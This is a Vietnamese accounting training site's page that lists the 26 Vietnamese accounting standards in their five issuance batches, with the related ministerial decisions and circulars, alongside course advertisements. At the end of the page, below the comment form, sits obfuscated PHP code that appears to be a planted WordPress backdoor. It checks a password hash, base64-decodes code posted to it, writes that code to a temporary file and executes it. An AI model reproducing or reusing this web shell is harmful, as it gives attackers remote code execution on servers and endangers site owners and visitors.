1

Hệ thống chuẩn mực kế toán Việt Nam mới nhất

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Hệ thống chuẩn mực kế toán Việt Nam gồm 26 chuẩn mực đã được Bộ tài chính ban hành qua 5 đợt gồm 5 Quyết định và 6 Thông tư cụ thể như sau:

Đợt 1: Ban hành ngày 31/12/2001 gồm 4 chuẩn mực sau:
 
1- Chuẩn mực kế toán số 02 Hàng tồn kho

2 – Chuẩn mực kế toán số 03 Tài sản cố định hữu hình

3 – Chuẩn mực kế toán số 04 Tài sản cố định vô hình

4 – Chuẩn mực kế toán số 14 Doanh thu và thu nhập khác
 
(Theo quyết định số 149/2001/QĐ-BTC ngày 31/12/2001 và Thông tư số 161/2007/TT-BTC ngày 31/12/2007 của Bộ trưởng bộ tài chính)
 
Đợt 2: Ban hành ngày 31/12/2002 gồm 6 chuẩn mực sau:
 
5 – Chuẩn mực kế toán số 01 – Chuẩn mực chung;

6 – Chuẩn mực kế toán số 06 – Thuê tài sản;

7 – Chuẩn mực kế toán số 10 – ảnh hưởng của việc thay đổi tỷ giá hối đoái;

8 – Chuẩn mực kế toán số 15 – Hợp đồng xây dựng;

9 – Chuẩn mực kế toán số 16 – Chi phí đi vay;

10 – Chuẩn mực kế toán số 24 – Báo cáo lưu chuyển tiền tệ.
 
(Theo quyết định số 165/2002/QĐ-BTC ngày 31/12/2002 và Thông tư số 161/2007/TT-BTC ngày 31/12/2007 của Bộ trưởng bộ tài chính)
 
Đợt 3: Ban hành ngày 30/12/2003 gồm 6 chuẩn mực sau:
 
11 – Chuẩn mực kế toán số 05 – Bất động sản đầu tư;

12 – Chuẩn mực kế toán số 07 – Các khoản đầu tư vào công ty liên kết;

13 – Chuẩn mực kế toán số 08 – Thông tin t.chính về những khoản vốn góp LD

14 – Chuẩn mực kế toán số 21 – Trình bày báo cáo tài chính;

15 – Chuẩn mực kế toán số 25 – BCTC hợp nhất và k.toán khoản ĐT vào cty con;

16 – Chuẩn mực kế toán số 26 – Thông tin về các bên liên quan.
 
(Theo quyết định số 234/2003/QĐ-BTC ngày 30/12/2003 và Thông tư số 161/2007/TT-BTC ngày 31/12/2007 của Bộ trưởng bộ tài chính)
 
Đợt 4: Ban hành ngày 15/02/2005 gồm 6 chuẩn mực sau:
 
17 – Chuẩn mực kế toán số 17 – Thuế thu nhập doanh nghiệp;

18 – Chuẩn mực kế toán số 22 – Trình bày bổ sung báo cáo tài chính của các ngân hàng và tổ chức tài chính tương tự;

19 – Chuẩn mực kế toán số 23 – Các sự kiện phát sinh sau ngày kết thúc kỳ kế toán năm;

20 – Chuẩn mực kế toán số 27 – Báo cáo tài chính giữa niên độ;

21 – Chuẩn mực kế toán số 28 – Báo cáo bộ phận;

22 – Chuẩn mực kế toán số 29 – Thay đổi chính sách kế toán, ước tính kế toán và các sai sót.
 
(Theo quyết định số 12/2005/QĐ-BTC ngày 15/02/2005 và Thông tư số 20/2006/TT-BTC ngày 20/03/2006  của Bộ trưởng bộ tài chính)
 
Đợt 5: Ban hành ngày 28/12/2005 gồm 4 chuẩn mực sau:
 
23 – Chuẩn mực kế toán số 11 – Hợp nhất kinh doanh;

24 – Chuẩn mực kế toán số 18 – Các khoản dự phòng, tài sản và nợ tiềm tàng;

25 – Chuẩn mực kế toán số 19 – Hợp đồng bảo hiểm;

26 – Chuẩn mực kế toán số 30 – Lãi trên cổ phiếu.
 
(Theo quyết định số 100/2005/QĐ-BTC ngày 28/12/2005 và Thông tư số 21/2006/TT-BTC ngày 20/3/2006 của Bộ trưởng bộ tài chính)
 
Hệ thống 26 chuẩn mực kế toán Việt Nam đầy đủ nhất  và mới nhất. Các bạn có thể tải về tại đây: DOWNLOAD

KẾ TOÁN HÀ NỘI chúc các bạn thành công
__________________________________________________

hệ thống chuẩn mực kế toán việt nam

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}